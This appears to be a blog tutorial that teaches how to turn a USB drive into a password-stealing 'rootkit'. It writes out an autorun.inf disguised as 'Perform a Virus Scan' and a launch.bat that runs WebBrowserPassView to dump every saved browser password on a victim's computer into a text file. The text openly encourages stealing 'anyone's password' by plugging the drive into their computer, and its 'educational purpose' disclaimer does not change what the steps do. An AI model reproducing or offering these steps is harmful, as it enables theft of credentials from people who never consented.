Before proceeding with full tutorial, let me remind one thing to my all readers that "
Please Use This Tutorial Only For Educational Purpose", don't harm others by stealing their password for personal cause. We are here to teach you regards all methods of computing world so please don't misuse our hard work tricks.
Now let's come to the main part of the discussion, most of you already got the main base of this post that we are going to steal password. Here in this post we are going to show you an easy way of stealing saved password from web browsers by using Pen drive. You don't have to be hack experts for this tutorial, you just have to follow some simple steps and you can easily steal anyone's password by just plugging your Pen drive in anyone's computer.
Most of you are habituate to click on save password once your browser asked for confirmation, so from today onward stop this habit of saving password because it might be dangerous for your security reasons. That's why I already mentioned above that use this tutorial just for educational purpose because you have to learn the whole structure of anything after that only you will be able to know the main root cause . So let's proceed and follow below given steps carefully.
Here we are going to create our own Rootkit via which we can sniff anyone's computers saved password.
Steps To Follow :
- At first, download below given software named as WebBrowserPassView from below given link.
Now here the main part, How to use this software to stealing saved password.
Requirements :-
1) Pen Drive.
2) WebBrowserPassView.exe Software.
- Plug your Pen drive in computer.
- Copy above downloaded software and paste it in Pen drive.
- Now create a new notepad in pen drive and write the below given code inside it.
[autorun] open=launch.bat ACTION= Perform a Virus Scan
- Now rename the notepad to autorun.inf and save it.
- Create another Noepad in Pen drive and write below given code in it.
start WebBrowserPassView.exe /stext WebBrowserPassView.txt
- Finally save the notepad and rename it to launch.bat and save.
- Now go and plug it in any computer and after your work done, just click on launch.bat file .
- Now all saved browser will show in newly auto created text file ( WebBrowserPassView.txt )
Its Done !! Now your Rootkit for stealing password is ready. Now you can use this Pen drive in any computer to steal all saved password.
How It Works :-
- Whenever you insert this Pen drive in any computer , it will automatically launch a new autorun file ( This is because we created autorun file ).
- Now all the saved password will automatically get stored in new auto created text document " WebBrowserPassView.txt " ( This is because we created launch.bat file ).
If still you are facing any error after following above given trick, then you can ask anytime for help in comments.
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